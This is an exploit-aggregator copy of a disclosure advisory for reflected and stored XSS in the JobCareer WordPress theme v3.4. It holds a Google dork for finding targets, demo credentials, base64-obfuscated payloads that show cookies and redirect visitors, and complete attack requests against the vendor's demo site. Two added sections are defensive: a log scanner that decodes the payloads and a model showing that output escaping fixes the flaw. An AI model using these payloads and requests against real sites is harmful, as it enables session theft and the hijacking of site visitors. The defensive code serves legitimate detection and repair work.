JobCareer | Job Board Responsive WordPress Theme v3.4 - Multiple Vulnerabilities

CVE: CVE-2021-24189
Category: CWE-79
Price: $500
Severity: High
Author: Rakesh Mane
Risk: High
Exploitation Type: Remote
Date: 2020-07-27
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS: 0.93
EPSSP: 0.99403


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070129

Below is a copy:

JobCareer | Job Board Responsive WordPress Theme v3.4 - Multiple Vulnerabilities
[+] Exploit Title: JobCareer | Job Board Responsive WordPress Theme v3.4 - Multiple Vulnerabilities
[+] Google Dork: inurl:/wp-content/themes/jobcareer/
[+] Date: 2020-07-24
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Chimp Studio [ https://chimpgroup.com ]
[+] Software Version: 3.4
[+] Software Link: https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] Unauthenticated Reflected & Authenticated Persistent XSS vulnerabilities were discovered in the JobCareer theme through 3.4 for WordPress.

[i] Unauthenticated Reflected XSS -> Vulnerable parameters: job_title, specialisms, location

[i] Authenticated Persistent XSS on Employer Profile -> Complete Address text field

[i] Demo account: vladvector / vector (login / password)

[i] PoC Employer Profile URL: http://jobcareer.chimpgroup.com/employer/vladvector/



### [ Vulnerabilities: ]

[x] Unauthenticated Reflected XSS

[x] Authenticated Persistent XSS



### [ Payloads: ]

[$] "><svg/onload=eval(atob(`amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7`))>

[$] "><!--<img src="--><img src=x onerror=(alert)(`VLADVECTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru/`;//">



### [ PoC Unauthenticated Reflected XSS: ]

[!] http://jobcareer.chimpgroup.com/jobs-modern-list/?job_title=%22%3E%3Csvg%2Fonload%3Deval%28atob%28%60amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7%60%29%29%3E&specialisms=&cs_search_location_field=&location=&radius=5&cs_=&cs_=Find+Job

[!] GET /jobs-modern-list/?job_title=%22%3E%3Csvg%2Fonload%3Deval%28atob%28%60amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7%60%29%29%3E&specialisms=&cs_search_location_field=&location=&radius=5&cs_=&cs_=Find+Job HTTP/1.1
Host: jobcareer.chimpgroup.com
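An added example, not part of the advisory, showing how a site owner would confirm from web server logs whether the reflected parameters were hit. The script parses Apache-style access log lines, decodes the query string, checks the three parameters the advisory names (job_title, specialisms, location) for markup or script indicators, and decodes any base64 handed to atob() so the analyst sees the actual script rather than an opaque blob. The log lines, client addresses and timestamps are constructed for this example; the first request reuses the query string from the PoC above and the second is a normal search that should not be flagged.

```python
import re
import base64
import binascii
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache "combined"-style access log lines (sample data for this
# example, not a capture from the site). The first request carries the
# reflected-XSS query string from the advisory; the second is a normal search.
SAMPLE_LOG = r'''
203.0.113.7 - - [24/Jul/2020:10:15:01 +0000] "GET /jobs-modern-list/?job_title=%22%3E%3Csvg%2Fonload%3Deval%28atob%28%60amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7%60%29%29%3E&specialisms=&cs_search_location_field=&location=&radius=5&cs_=&cs_=Find+Job HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.8 - - [24/Jul/2020:10:16:44 +0000] "GET /jobs-modern-list/?job_title=Senior+Engineer&specialisms=banking&location=London&radius=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
'''.strip()

# The three parameters the advisory names as reflected without encoding.
WATCHED_PARAMS = ("job_title", "specialisms", "location")

# Indicators of markup or script injection in a value that should be plain text.
INDICATORS = re.compile(r"<\s*[a-z]|on[a-z]+\s*=|javascript:|atob\s*\(|eval\s*\(", re.I)
# Base64 literal passed to atob(), quoted with backtick, single or double quote.
ATOB_ARG = re.compile(r"atob\s*\(\s*[`'\"]([A-Za-z0-9+/=]+)[`'\"]\s*\)")
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_atob_args(value):
    """Decode base64 strings passed to atob() so the analyst sees the real script."""
    decoded = []
    for b64 in ATOB_ARG.findall(value):
        try:
            decoded.append(base64.b64decode(b64, validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            decoded.append("<undecodable base64>")
    return decoded


def inspect_request(line):
    """Return a finding dict for one log line, or None when nothing looks injected."""
    m = REQUEST_LINE.search(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    params = parse_qs(target.query, keep_blank_values=True)
    hits = {}
    for name in WATCHED_PARAMS:
        for raw in params.get(name, []):
            # parse_qs already percent-decodes once; a second pass catches double encoding.
            value = unquote(raw)
            if INDICATORS.search(value):
                hits[name] = {"value": value, "atob_decoded": decode_atob_args(value)}
    if not hits:
        return None
    return {"client": line.split(" ", 1)[0], "path": target.path, "hits": hits}


def scan_log(text):
    """Run inspect_request over every line and keep only the findings."""
    return [f for f in (inspect_request(line) for line in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["client"], finding["path"])
        for name, info in finding["hits"].items():
            print(f"  {name}: {info['value'][:60]!r}")
            for script in info["atob_decoded"]:
                print(f"    atob() decodes to: {script!r}")
```

The indicator list is deliberately short and will not catch every encoding trick; it is a triage aid for answering "was this parameter hit, and what did the script do", not a substitute for encoding the reflected values in the theme's template.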



### [ PoC Authenticated Persistent XSS -> Employer Profile: ]

[!] POST /wp-admin/admin-ajax.php HTTP/1.1
Host: jobcareer.chimpgroup.com
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------373898295520776006712397621876
Content-Length: 3832
Origin: http://jobcareer.chimpgroup.com
Referer: http://jobcareer.chimpgroup.com/employer-account/?profile_tab=profile
Cookie: [cookies_here]

-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="media_upload"

undefined
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cover_media_upload"

undefined
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_employer_img"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_cover_employer_img"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="display_name"

VladVector
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_allow_search"

yes
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_specialisms[]"

banking
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="comp_detail"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_facebook"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_twitter"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_linkedin"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_phone_number"

1337
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="user_email"

[email protected]
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="user_url"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_country"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_city"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_comp_address"

"><!--<img src="--><img src=x onerror=(alert)(`VLAD\x20VECTOR`);window.location=`https://vladvector.ru/`;//">
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_address"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_latitude"

51.5073509
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_longitude"

-0.12775829999998223
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_add_new_loc"


-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_post_loc_zoom"

11
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_cus_field[established]"

1337
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_cus_field[team-size]"

1337
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_cus_field[type]"

private
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="user_profile"

update_profile
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="cs_user"

12919
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="action"

ajax_employer_form_save
-----------------------------373898295520776006712397621876
Content-Disposition: form-data; name="post_id"

12919
-----------------------------373898295520776006712397621876--
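The leading `">` of the stored payload indicates that the saved address is echoed back into a quoted attribute of the profile form without encoding. As an added example (not code from the theme or the advisory), the following Python models that template: render_address_field() with escape=False reproduces the unsafe behaviour, escape=True applies attribute-context encoding (html.escape, the same idea as WordPress's esc_attr()), and a small HTMLParser subclass reports which tags and on* event-handler attributes a parser sees in each case. The input element and its attribute names are an assumption about the form's markup; the stored value is the one from the cs_post_comp_address field above, with the `\x20` kept verbatim.

```python
import html
from html.parser import HTMLParser

# The value the advisory shows being stored in the "Complete Address" field
# (cs_post_comp_address). Copied from the PoC; the \x20 is a JavaScript escape
# inside the template literal and is left as-is (raw string, so no real space).
STORED_ADDRESS = r'''"><!--<img src="--><img src=x onerror=(alert)(`VLAD\x20VECTOR`);window.location=`https://vladvector.ru/`;//">'''


class TagCollector(HTMLParser):
    """Record the tags and on* attributes a browser-like parser would see."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.event_handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.event_handlers.extend(a for a, _ in attrs if a.lower().startswith("on"))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)


def render_address_field(value, escape=True):
    """Hypothetical template for the profile form's address input.

    escape=False reproduces the unsafe behaviour the advisory describes (the
    stored value is dropped straight into the attribute); escape=True is the fix:
    encode for the attribute context before interpolating.
    """
    if escape:
        value = html.escape(value, quote=True)
    return f'<input type="text" name="cs_post_comp_address" value="{value}">'


def analyse(markup):
    """Parse the rendered markup and report tags plus event-handler attributes."""
    p = TagCollector()
    p.feed(markup)
    p.close()
    return {"tags": p.tags, "event_handlers": p.event_handlers}


if __name__ == "__main__":
    for escape in (False, True):
        markup = render_address_field(STORED_ADDRESS, escape=escape)
        print("escape =", escape, "->", analyse(markup))
```

With escape=False the parser sees the input element, then a comment that swallows the first `<img src="`, then a second img element carrying an onerror handler; with escape=True every `<`, `>` and `"` in the value is encoded, the attribute stays closed, and the only element is the input. Encoding on output is the fix regardless of how the value was validated on the way in, because the same stored string may be rendered in more than one context.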



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector
